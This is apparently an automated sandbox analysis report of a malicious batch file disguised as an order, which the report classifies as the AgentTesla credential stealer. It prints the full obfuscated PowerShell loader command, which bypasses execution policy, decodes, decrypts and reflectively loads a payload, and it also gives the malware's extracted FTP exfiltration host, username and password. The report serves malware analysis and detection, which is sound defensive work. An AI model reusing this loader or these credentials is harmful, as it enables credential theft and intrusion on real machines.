Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
order no_3_17_2025 ref_HR 6473876476374647464657464564764746.bat

Overview

General Information

Sample name:order no_3_17_2025 ref_HR 6473876476374647464657464564764746.bat
Analysis ID:1640973
MD5:fd5fbe534669e2b0fd7b50bd8acf1342
SHA1:dc7428fcb7f9b33a7e49b5a96cc743983951a071
SHA256:f6b6e3664095437f4984389106b6609575fbd411c38f71f696e148ec7df15c14
Tags:batuser-smica83
Infos:

Detection

AgentTesla, Batch Injector
Score:100
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected Batch Injector
Yara detected Powershell decode and execute
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses FTP
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 8536 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\order no_3_17_2025 ref_HR 6473876476374647464657464564764746.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 8544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 8588 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\order no_3_17_2025 ref_HR 6473876476374647464657464564764746.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 8644 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRzY3JpcHRDb250ZW50ID0gQCcNCiR1c2Vyc2lla2xOYW1lIHNpZWtsPSAkZW5zaWVrbHY6VVNFc2lla2xSTkFNRXNpZWtsOyRxY2dzaWVrbGttID0gc2lla2wiQzpcVXNpZWtsc2Vyc1xzaWVrbCR1c2Vyc2lla2xOYW1lXHNpZWtsZHdtLmJzaWVrbGF0Ijtpc2lla2xmIChUZXNpZWtsc3QtUGFzaWVrbHRoICRxc2lla2xjZ2ttKXNpZWtsIHsgICBzaWVrbCBXcml0c2lla2xlLUhvc3NpZWtsdCAiQmFzaWVrbHRjaCBmc2lla2xpbGUgZnNpZWtsb3VuZDpzaWVrbCAkcWNnc2lla2xrbSIgLXNpZWtsRm9yZWdzaWVrbHJvdW5kc2lla2xDb2xvcnNpZWtsIEN5YW5zaWVrbDsgICAgc2lla2wkZmlsZXNpZWtsTGluZXNzaWVrbCA9IFtTc2lla2x5c3RlbXNpZWtsLklPLkZzaWVrbGlsZV06c2lla2w6UmVhZHNpZWtsQWxsTGlzaWVrbG5lcygkc2lla2xxY2drbXNpZWtsLCBbU3lzaWVrbHN0ZW0uc2lla2xUZXh0LnNpZWtsRW5jb2RzaWVrbGluZ106c2lla2w6VVRGOHNpZWtsKTsgICBzaWVrbCBmb3Jlc2lla2xhY2ggKHNpZWtsJGxpbmVzaWVrbCBpbiAkc2lla2xmaWxlTHNpZWtsaW5lcylzaWVrbCB7ICAgc2lla2wgICAgIHNpZWtsaWYgKCRzaWVrbGxpbmUgc2lla2wtbWF0Y3NpZWtsaCAnXjpzaWVrbDo6ID8oc2lla2wuKykkJ3NpZWtsKSB7ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsV3JpdGVzaWVrbC1Ib3N0c2lla2wgIkluanNpZWtsZWN0aW9zaWVrbG4gY29kc2lla2xlIGRldHNpZWtsZWN0ZWRzaWVrbCBpbiB0c2lla2xoZSBiYXNpZWtsdGNoIGZzaWVrbGlsZS4ic2lla2wgLUZvcnNpZWtsZWdyb3VzaWVrbG5kQ29sc2lla2xvciBDeXNpZWtsYW47ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsdHJ5IHtzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAkZGVjc2lla2xvZGVkQnNpZWtseXRlcyBzaWVrbD0gW1N5c2lla2xzdGVtLnNpZWtsQ29udmVzaWVrbHJ0XTo6c2lla2xGcm9tQnNpZWtsYXNlNjRzaWVrbFN0cmluc2lla2xnKCRtYXNpZWtsdGNoZXNzaWVrbFsxXS5Uc2lla2xyaW0oKXNpZWtsKTsgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgJGlzaWVrbG5qZWN0c2lla2xpb25Db3NpZWtsZGUgPSBzaWVrbFtTeXN0c2lla2xlbS5UZXNpZWtseHQuRW5zaWVrbGNvZGluc2lla2xnXTo6VXNpZWtsbmljb2RzaWVrbGUuR2V0c2lla2xTdHJpbnNpZWtsZygkZGVzaWVrbGNvZGVkc2lla2xCeXRlc3NpZWtsKTsgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgV3JzaWVrbGl0ZS1Ic2lla2xvc3QgInNpZWtsSW5qZWNzaWVrbHRpb24gc2lla2xjb2RlIHNpZWtsZGVjb2RzaWVrbGVkIHN1c2lla2xjY2Vzc3NpZWtsZnVsbHlzaWVrbC4iIC1Gc2lla2xvcmVncnNpZWtsb3VuZENzaWVrbG9sb3Igc2lla2xHcmVlbnNpZWtsOyAgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICBXcmlzaWVrbHRlLUhvc2lla2xzdCAiRXNpZWtseGVjdXRzaWVrbGluZyBpc2lla2xuamVjdHNpZWtsaW9uIGNzaWVrbG9kZS4uc2lla2wuIiAtRnNpZWtsb3JlZ3JzaWVrbG91bmRDc2lla2xvbG9yIHNpZWtsWWVsbG9zaWVrbHc7ICAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAgIEluc2lla2x2b2tlLXNpZWtsRXhwcmVzaWVrbHNzaW9uc2lla2wgJGluanNpZWtsZWN0aW9zaWVrbG5Db2Rlc2lla2w7ICAgIHNpZWtsICAgICBzaWVrbCAgICAgc2lla2wgIGJyZXNpZWtsYWs7ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsfSBjYXRzaWVrbGNoIHsgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAgICAgc2lla2xXcml0ZXNpZWtsLUhvc3RzaWVrbCAiRXJyc2lla2xvciBkdXNpZWtscmluZyBzaWVrbGRlY29kc2lla2xpbmcgb3NpZWtsciBleGVzaWVrbGN1dGluc2lla2xnIGluanNpZWtsZWN0aW9zaWVrbG4gY29kc2lla2xlOiAkX3NpZWtsIiAtRm9zaWVrbHJlZ3Jvc2lla2x1bmRDb3NpZWtsbG9yIFJzaWVrbGVkOyAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbH07ICAgc2lla2wgICAgIHNpZWtsfTsgICBzaWVrbCB9O30gc2lla2xlbHNlIHNpZWtseyAgICBzaWVrbCAgV3Jpc2lla2x0ZS1Ib3NpZWtsc3QgIlNzaWVrbHlzdGVtc2lla2wgRXJyb3NpZWtscjogQmFzaWVrbHRjaCBmc2lla2xpbGUgbnNpZWtsb3QgZm9zaWVrbHVuZDogc2lla2wkcWNna3NpZWtsbSIgLUZzaWVrbG9yZWdyc2lla2xvdW5kQ3NpZWtsb2xvciBzaWVrbFJlZDsgc2lla2wgICBleHNpZWtsaXQ7fTtzaWVrbGZ1bmN0c2lla2xpb24ganNpZWtseXZ0ZyhzaWVrbCRwYXJhc2lla2xtX3ZhcnNpZWtsKXsJJGFzaWVrbGVzX3Zhc2lla2xyPVtTeXNpZWtsc3RlbS5zaWVrbFNlY3Vyc2lla2xpdHkuQ3NpZWtscnlwdG9zaWVrbGdyYXBoc2lla2x5LkFlc3NpZWtsXTo6Q3JzaWVrbGVhdGUoc2lla2wpOwkkYXNpZWtsZXNfdmFzaWVrbHIuTW9kc2lla2xlPVtTeXNpZWtsc3RlbS5zaWVrbFNlY3Vyc2lla2xpdHkuQ3NpZWtscnlwdG9zaWVrbGdyYXBoc2lla2x5LkNpcHNpZWtsaGVyTW9zaWVrbGRlXTo6c2lla2xDQkM7CXNpZWtsJGFlc19zaWVrbHZhci5Qc2lla2xhZGRpbnNpZWtsZz1bU3lzaWVrbHN0ZW0uc2lla2xTZWN1cnNpZWtsaXR5LkNzaWVrbHJ5cHRvc2lla2xncmFwaHNpZWtseS5QYWRzaWVrbGRpbmdNc2lla2xvZGVdOnNpZWtsOlBLQ1NzaWVrbDc7CSRhc2lla2xlc192YXNpZWtsci5LZXlzaWVrbD1bU3lzc2lla2x0ZW0uQ3NpZWtsb252ZXJzaWVrbHRdOjpGc2lla2xyb21CYXNpZWtsc2U2NFNzaWVrbHRyaW5nc2lla2woJ21CbHNpZWtsMnVQUGJzaWVrbHgzcjRBc2lla2w2RTAxM3NpZWtsSXEvK1FzaWVrbDVnOGVVc2lla2xHbEMvcnNpZWtsSisweTNzaWVrbEZpa2p3c2lla2w9Jyk7CXNpZWtsJGFlc19zaWVrbHZhci5Jc2lla2xWPVtTeXNpZWtsc3RlbS5zaWVrbENvbnZlc2lla2xydF06OnNpZWtsRnJvbUJzaWVrbGFzZTY0c2lla2xTdHJpbnNpZWtsZygnYVNzaWVrbDR4a2dYc2lla2xQK01tNXNpZWtsMXQrVWJzaWVrbGI1aXl3c2lla2w9PScpO3NpZWtsCSRkZWNzaWVrbHJ5cHRvc2lla2xyX3ZhcnNpZWtsPSRhZXNzaWVrbF92YXIuc2lla2xDcmVhdHNpZWtsZURlY3JzaWVrbHlwdG9yc2lla2woKTsJJHNpZWtscmV0dXJzaWVrbG5fdmFyc2lla2w9JGRlY3NpZWtscnlwdG9zaWVrbHJfdmFyc2lla2wuVHJhbnNpZWtsc2Zvcm1zaWVrbEZpbmFsc2lla2xCbG9ja3NpZWtsKCRwYXJzaWVrbGFtX3Zhc2lla2xyLCAwLHNpZWtsICRwYXJzaWVrbGFtX3Zhc2lla2xyLkxlbnNpZWtsZ3RoKTtzaWVrbAkkZGVjc2lla2xyeXB0b3NpZWtscl92YXJzaWVrbC5EaXNwc2lla2xvc2UoKXNpZWtsOwkkYWVzaWVrbHNfdmFyc2lla2wuRGlzcHNpZWtsb3NlKClzaWVrbDsJJHJlc2lla2x0dXJuX3NpZWtsdmFyO31zaWVrbGZ1bmN0c2lla2xpb24gdXNpZWtseHdicihzaWVrbCRwYXJhc2lla2xtX3ZhcnNpZWtsKXsJJGlzaWVrbGRpdHI9c2lla2xOZXctT3NpZWtsYmplY3RzaWVrbCBTeXN0c2lla2xlbS5JT3NpZWtsLk1lbW9zaWVrbHJ5U3Ryc2lla2xlYW0oLHNpZWtsJHBhcmFzaWVrbG1fdmFyc2lla2wpOwkkd3NpZWtsY3BlbT1zaWVrbE5ldy1Pc2lla2xiamVjdHNpZWtsIFN5c3RzaWVrbGVtLklPc2lla2wuTWVtb3NpZWtscnlTdHJzaWVrbGVhbTsJc2lla2wkaW1wbXNpZWtseD1OZXdzaWVrbC1PYmplc2lla2xjdCBTeXNpZWtsc3RlbS5zaWVrbElPLkNvc2lla2xtcHJlc3NpZWtsc2lvbi5zaWVrbEdaaXBTc2lla2x0cmVhbXNpZWtsKCRpZGlzaWVrbHRyLCBbc2lla2xJTy5Db3NpZWtsbXByZXNzaWVrbHNpb24uc2lla2xDb21wcnNpZWtsZXNzaW9zaWVrbG5Nb2Rlc2lla2xdOjpEZXNpZWtsY29tcHJzaWVrbGVzcyk7c2lla2wJJGltcHNpZWtsbXguQ29zaWVrbHB5VG8oc2lla2wkd2NwZXNpZWtsbSk7CSRzaWVrbGltcG14c2lla2wuRGlzcHNpZWtsb3NlKClzaWVrbDsJJGlkc2lla2xpdHIuRHNpZWtsaXNwb3NzaWVrbGUoKTsJc2lla2wkd2NwZXNpZWtsbS5EaXNzaWVrbHBvc2Uoc2lla2wpOwkkd3NpZWtsY3BlbS5zaWVrbFRvQXJyc2lla2xheSgpO3NpZWtsfWZ1bmNzaWVrbHRpb24gc2lla2xjb2podHNpZWtsKCRwYXJzaWVrbGFtX3Zhc2lla2xyLCRwYXNpZWtscmFtMl9zaWVrbHZhcil7c2lla2wJJGJtcXNpZWtsaXg9W1NzaWVrbHlzdGVtc2lla2wuUmVmbHNpZWtsZWN0aW9zaWVrbG4uQXNzc2lla2xlbWJseXNpZWtsXTo6KCdzaWVrbGRhb0wnc2lla2xbLTEuLnNpZWtsLTRdIC1zaWVrbGpvaW4gc2lla2wnJykoW3NpZWtsYnl0ZVtzaWVrbF1dJHBhc2lla2xyYW1fdnNpZWtsYXIpOwlzaWVrbCRhc2F3c2lla2xmPSRibXNpZWtscWl4LkVzaWVrbG50cnlQc2lla2xvaW50O3NpZWtsCSRhc2FzaWVrbHdmLkluc2lla2x2b2tlKHNpZWtsJG51bGxzaWVrbCwgJHBhc2lla2xyYW0yX3NpZWtsdmFyKTtzaWVrbH0kaG9zc2lla2x0LlVJLnNpZWtsUmF3VUlzaWVrbC5XaW5kc2lla2xvd1RpdHNpZWtsbGUgPSBzaWVrbCRxY2drc2lla2xtOyR6anNpZWtsaGtiPVtzaWVrbFN5c3Rlc2lla2xtLklPLnNpZWtsRmlsZV1zaWVrbDo6KCd0c2lla2x4ZVRsbHNpZWtsQWRhZVJzaWVrbCdbLTEuc2lla2wuLTExXXNpZWtsIC1qb2lzaWVrbG4gJycpc2lla2woJHFjZ3NpZWtsa20pLlNzaWVrbHBsaXQoc2lla2xbRW52aXNpZWtscm9ubWVzaWVrbG50XTo6c2lla2xOZXdMaXNpZWtsbmUpO2ZzaWVrbG9yZWFjc2lla2xoICgkeXNpZWtscG90YSBzaWVrbGluICR6c2lla2xqaGtiKXNpZWtsIHsJaWZzaWVrbCAoJHlwc2lla2xvdGEuU3NpZWtsdGFydHNzaWVrbFdpdGgoc2lla2wnOjogJ3NpZWtsKSkJewlzaWVrbAkkcmxvc2lla2x3cD0keXNpZWtscG90YS5zaWVrbFN1YnN0c2lla2xyaW5nKHNpZWtsMyk7CQlzaWVrbGJyZWFrc2lla2w7CX19JHNpZWtscG95am5zaWVrbD1bc3Ryc2lla2xpbmdbXXNpZWtsXSRybG9zaWVrbHdwLlNwc2lla2xsaXQoJ3NpZWtsXCcpOyRzaWVrbGNqeXlrc2lla2w9dXh3YnNpZWtsciAoanlzaWVrbHZ0ZyAoc2lla2xbQ29udnNpZWtsZXJ0XTpzaWVrbDpGcm9tc2lla2xCYXNlNnNpZWtsNFN0cmlzaWVrbG5nKCRwc2lla2xveWpuW3NpZWtsMF0pKSlzaWVrbDskcnhjc2lla2x4bD11eHNpZWtsd2JyIChzaWVrbGp5dnRnc2lla2wgKFtDb3NpZWtsbnZlcnRzaWVrbF06OkZyc2lla2xvbUJhc3NpZWtsZTY0U3RzaWVrbHJpbmcoc2lla2wkcG95anNpZWtsblsxXSlzaWVrbCkpO2Nvc2lla2xqaHQgJHNpZWtsY2p5eWtzaWVrbCAkbnVsc2lla2xsO2NvanNpZWtsaHQgJHJzaWVrbHhjeGwgc2lla2woLFtzdHNpZWtscmluZ1tzaWVrbF1dICgnc2lla2wlKicpKXNpZWtsOw0KJ0ANCg0KJGRlb2JmdXNjYXRlZCA9ICRzY3JpcHRDb250ZW50IC1yZXBsYWNlICdzaWVrbCcsICcnDQoNCkludm9rZS1FeHByZXNzaW9uICRkZW9iZnVzY2F0ZWQNCg==')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "FTP", "Host": "ftp://ftp.hitplas.ro", "Username": "hit@hitplas.ro", "Password": "@hitplas.ro"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000004.00000002.3788613694.0000000005EB2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000004.00000002.3788613694.0000000005DE0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
        00000004.00000002.3794927751.0000000008DD5000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000004.00000002.3794622597.00000000082E0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
            00000004.00000002.3794927751.0000000008E2B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
              Click to see the 6 entries
              SourceRuleDescriptionAuthorStrings
              4.2.powershell.exe.5e62e10.1.raw.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                4.2.powershell.exe.5eb2e30.5.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                  4.2.powershell.exe.82e0000.8.raw.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    4.2.powershell.exe.82e0000.8.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                      4.2.powershell.exe.5e3adf0.4.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                        Click to see the 3 entries
                        SourceRuleDescriptionAuthorStrings
                        amsi32_8644.amsi.csvJoeSecurity_BatchInjectorYara detected Batch InjectorJoe Security
                          amsi32_8644.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

                            System Summary

                            barindex
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRzY3JpcHRDb250ZW50ID0gQCcNCiR1c2Vyc2lla2xOYW1lIHNpZWtsPSAkZW5zaWVrbHY6VVNFc2lla2xSTkFNRXNpZWtsOyRxY2dzaWVrbGttID0gc2lla2wiQzpcVXNpZWtsc2Vyc1xzaWVrbCR1c2Vyc2lla2xOYW1lXHNpZWtsZHdtLmJzaWVrbGF0Ijtpc2lla2xmIChUZXNpZWtsc3QtUGFzaWVrbHRoICRxc2lla2xjZ2ttKXNpZWtsIHsgICBzaWVrbCBXcml0c2lla2xlLUhvc3NpZWtsdCAiQmFzaWVrbHRjaCBmc2lla2xpbGUgZnNpZWtsb3VuZDpzaWVrbCAkcWNnc2lla2xrbSIgLXNpZWtsRm9yZWdzaWVrbHJvdW5kc2lla2xDb2xvcnNpZWtsIEN5YW5zaWVrbDsgICAgc2lla2wkZmlsZXNpZWtsTGluZXNzaWVrbCA9IFtTc2lla2x5c3RlbXNpZWtsLklPLkZzaWVrbGlsZV06c2lla2w6UmVhZHNpZWtsQWxsTGlzaWVrbG5lcygkc2lla2xxY2drbXNpZWtsLCBbU3lzaWVrbHN0ZW0uc2lla2xUZXh0LnNpZWtsRW5jb2RzaWVrbGluZ106c2lla2w6VVRGOHNpZWtsKTsgICBzaWVrbCBmb3Jlc2lla2xhY2ggKHNpZWtsJGxpbmVzaWVrbCBpbiAkc2lla2xmaWxlTHNpZWtsaW5lcylzaWVrbCB7ICAgc2lla2wgICAgIHNpZWtsaWYgKCRzaWVrbGxpbmUgc2lla2wtbWF0Y3NpZWtsaCAnXjpzaWVrbDo6ID8oc2lla2wuKykkJ3NpZWtsKSB7ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsV3JpdGVzaWVrbC1Ib3N0c2lla2wgIkluanNpZWtsZWN0aW9zaWVrbG4gY29kc2lla2xlIGRldHNpZWtsZWN0ZWRzaWVrbCBpbiB0c2lla2xoZSBiYXNpZWtsdGNoIGZzaWVrbGlsZS4ic2lla2wgLUZvcnNpZWtsZWdyb3VzaWVrbG5kQ29sc2lla2xvciBDeXNpZWtsYW47ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsdHJ5IHtzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAkZGVjc2lla2xvZGVkQnNpZWtseXRlcyBzaWVrbD0gW1N5c2lla2xzdGVtLnNpZWtsQ29udmVzaWVrbHJ0XTo6c2lla2xGcm9tQnNpZWtsYXNlNjRzaWVrbFN0cmluc2lla2xnKCRtYXNpZWtsdGNoZXNzaWVrbFsxXS5Uc2lla2xyaW0oKXNpZWtsKTsgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgJGlzaWVrbG5qZWN0c2lla2xpb25Db3NpZWtsZGUgPSBzaWVrbFtTeXN0c2lla2xlbS5UZXNpZWtseHQuRW5zaWVrbGNvZGluc2lla2xnXTo6VXNpZWtsbmljb2RzaWVrbGUuR2V0c2lla2xTdHJpbnNpZWtsZygkZGVzaWVrbGNvZGVkc2lla2xCeXRlc3NpZWtsKTsgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgV3JzaWVrbGl0ZS1Ic2lla2xvc3QgInNpZWtsSW5qZWNzaWVrbHRpb24gc2lla2xjb2RlIHNpZWtsZGVjb2RzaWVrbGVkIHN1c2lla2xjY2Vzc3NpZWtsZnVsbHlzaWVrbC4iIC1Gc2lla2xvcmVncnNpZWtsb3VuZENzaWVrbG9sb3Igc2lla2xHcmVlbnNpZWtsOyAgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICBXcmlzaWVrbHRlLUhvc2lla2xzdCAiRXNpZWtseGVjdXRzaWVrbGluZyBpc2lla2xuamVjdHNpZWtsaW9uIGNzaWVrbG9kZS4uc2lla2wuIiAtRnNpZWtsb3JlZ3JzaWVrbG91bmRDc2lla2xvbG9yIHNpZWtsWWVsbG9zaWVrbHc7ICAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAgIEluc2lla2x2b2tlLXNpZWtsRXhwcmVzaWVrbHNzaW9uc2lla2wgJGluanNpZWtsZWN0aW9zaWVrbG5Db2Rlc2lla2w7ICAgIHNpZWtsICAgICBzaWVrbCAgICAgc2lla2wgIGJyZXNpZWtsYWs7ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsfSBjYXRzaWVrbGNoIHsgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAgICAgc2lla2xXcml0ZXNpZWtsLUhvc3RzaWVrbCAiRXJyc2lla2xvciBkdXNpZWtscmluZyBzaWVrbGRlY29kc2lla2xpbmcgb3NpZWtsciBleGVzaWVrbGN1dGluc2lla2xnIGluanNpZWtsZWN0aW9zaWVrbG4gY29kc2lla2xlOiAkX3NpZWtsIiAtRm9zaWVrbHJlZ3Jvc2lla2x1bmRDb3NpZWtsbG9yIFJzaWVrbGVkOyAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbH07ICAgc2lla2wgICAgIHNpZWtsfTsgICBzaWVrbCB9O30gc2lla2xlbHNlIHNpZWtseyAgICBzaWVrbCAgV3Jpc2lla2x0ZS1Ib3NpZWtsc3QgIlNzaWVrbHlzdGVtc2lla2wgRXJyb3NpZWtscjogQmFzaWVrbHRjaCBmc2lla2xpbGUgbnNpZWtsb3QgZm9zaWVr
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRzY3JpcHRDb250ZW50ID0gQCcNCiR1c2Vyc2lla2xOYW1lIHNpZWtsPSAkZW5zaWVrbHY6VVNFc2lla2xSTkFNRXNpZWtsOyRxY2dzaWVrbGttID0gc2lla2wiQzpcVXNpZWtsc2Vyc1xzaWVrbCR1c2Vyc2lla2xOYW1lXHNpZWtsZHdtLmJzaWVrbGF0Ijtpc2lla2xmIChUZXNpZWtsc3QtUGFzaWVrbHRoICRxc2lla2xjZ2ttKXNpZWtsIHsgICBzaWVrbCBXcml0c2lla2xlLUhvc3NpZWtsdCAiQmFzaWVrbHRjaCBmc2lla2xpbGUgZnNpZWtsb3VuZDpzaWVrbCAkcWNnc2lla2xrbSIgLXNpZWtsRm9yZWdzaWVrbHJvdW5kc2lla2xDb2xvcnNpZWtsIEN5YW5zaWVrbDsgICAgc2lla2wkZmlsZXNpZWtsTGluZXNzaWVrbCA9IFtTc2lla2x5c3RlbXNpZWtsLklPLkZzaWVrbGlsZV06c2lla2w6UmVhZHNpZWtsQWxsTGlzaWVrbG5lcygkc2lla2xxY2drbXNpZWtsLCBbU3lzaWVrbHN0ZW0uc2lla2xUZXh0LnNpZWtsRW5jb2RzaWVrbGluZ106c2lla2w6VVRGOHNpZWtsKTsgICBzaWVrbCBmb3Jlc2lla2xhY2ggKHNpZWtsJGxpbmVzaWVrbCBpbiAkc2lla2xmaWxlTHNpZWtsaW5lcylzaWVrbCB7ICAgc2lla2wgICAgIHNpZWtsaWYgKCRzaWVrbGxpbmUgc2lla2wtbWF0Y3NpZWtsaCAnXjpzaWVrbDo6ID8oc2lla2wuKykkJ3NpZWtsKSB7ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsV3JpdGVzaWVrbC1Ib3N0c2lla2wgIkluanNpZWtsZWN0aW9zaWVrbG4gY29kc2lla2xlIGRldHNpZWtsZWN0ZWRzaWVrbCBpbiB0c2lla2xoZSBiYXNpZWtsdGNoIGZzaWVrbGlsZS4ic2lla2wgLUZvcnNpZWtsZWdyb3VzaWVrbG5kQ29sc2lla2xvciBDeXNpZWtsYW47ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsdHJ5IHtzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAkZGVjc2lla2xvZGVkQnNpZWtseXRlcyBzaWVrbD0gW1N5c2lla2xzdGVtLnNpZWtsQ29udmVzaWVrbHJ0XTo6c2lla2xGcm9tQnNpZWtsYXNlNjRzaWVrbFN0cmluc2lla2xnKCRtYXNpZWtsdGNoZXNzaWVrbFsxXS5Uc2lla2xyaW0oKXNpZWtsKTsgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgJGlzaWVrbG5qZWN0c2lla2xpb25Db3NpZWtsZGUgPSBzaWVrbFtTeXN0c2lla2xlbS5UZXNpZWtseHQuRW5zaWVrbGNvZGluc2lla2xnXTo6VXNpZWtsbmljb2RzaWVrbGUuR2V0c2lla2xTdHJpbnNpZWtsZygkZGVzaWVrbGNvZGVkc2lla2xCeXRlc3NpZWtsKTsgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgV3JzaWVrbGl0ZS1Ic2lla2xvc3QgInNpZWtsSW5qZWNzaWVrbHRpb24gc2lla2xjb2RlIHNpZWtsZGVjb2RzaWVrbGVkIHN1c2lla2xjY2Vzc3NpZWtsZnVsbHlzaWVrbC4iIC1Gc2lla2xvcmVncnNpZWtsb3VuZENzaWVrbG9sb3Igc2lla2xHcmVlbnNpZWtsOyAgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICBXcmlzaWVrbHRlLUhvc2lla2xzdCAiRXNpZWtseGVjdXRzaWVrbGluZyBpc2lla2xuamVjdHNpZWtsaW9uIGNzaWVrbG9kZS4uc2lla2wuIiAtRnNpZWtsb3JlZ3JzaWVrbG91bmRDc2lla2xvbG9yIHNpZWtsWWVsbG9zaWVrbHc7ICAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAgIEluc2lla2x2b2tlLXNpZWtsRXhwcmVzaWVrbHNzaW9uc2lla2wgJGluanNpZWtsZWN0aW9zaWVrbG5Db2Rlc2lla2w7ICAgIHNpZWtsICAgICBzaWVrbCAgICAgc2lla2wgIGJyZXNpZWtsYWs7ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsfSBjYXRzaWVrbGNoIHsgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAgICAgc2lla2xXcml0ZXNpZWtsLUhvc3RzaWVrbCAiRXJyc2lla2xvciBkdXNpZWtscmluZyBzaWVrbGRlY29kc2lla2xpbmcgb3NpZWtsc